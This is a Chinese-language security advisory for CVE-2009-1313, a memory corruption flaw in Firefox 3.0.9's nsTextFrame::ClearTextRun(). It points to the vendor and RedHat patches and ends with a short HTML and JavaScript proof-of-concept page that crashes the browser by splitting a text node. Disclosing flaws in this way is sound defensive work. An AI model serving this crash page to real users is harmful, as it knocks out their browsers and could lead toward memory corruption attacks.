BUGTRAQ ID: 34743
CVE(CAN) ID: CVE-2009-1313
Firefox是一款流行的开放源码WEB浏览器。
Firefox的nsTextFrame::ClearTextRun()函数中存在内存破坏漏洞,如果用户受骗打开了包含有恶意内容的网页就会导致浏览器崩溃。安装了HTML Validator附件组件的用户尤其受这个漏洞的影响。
Mozilla Firefox 3.0.9
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
<a href=“http://www.mozilla.org/” target=“_blank”>http://www.mozilla.org/</a>
RedHat已经为此发布了一个安全公告(RHSA-2009:0449-01)以及相应补丁:
RHSA-2009:0449-01:Critical: firefox security update
链接:<a href=“https://www.redhat.com/support/errata/RHSA-2009-0449.html” target=“_blank”>https://www.redhat.com/support/errata/RHSA-2009-0449.html</a>
<html><head><title> Bug 489647 - New 1.9.0.9 topcrash [@nsTextFrame::ClearTextRun()]</title></head>
<body>
<div id="a" style="white-space: pre;">
m</div>
<script>
function doe() {
document.getElementById('a').childNodes[0].splitText(1);
}
setTimeout(doe, 100);
</script>
</body>
</html>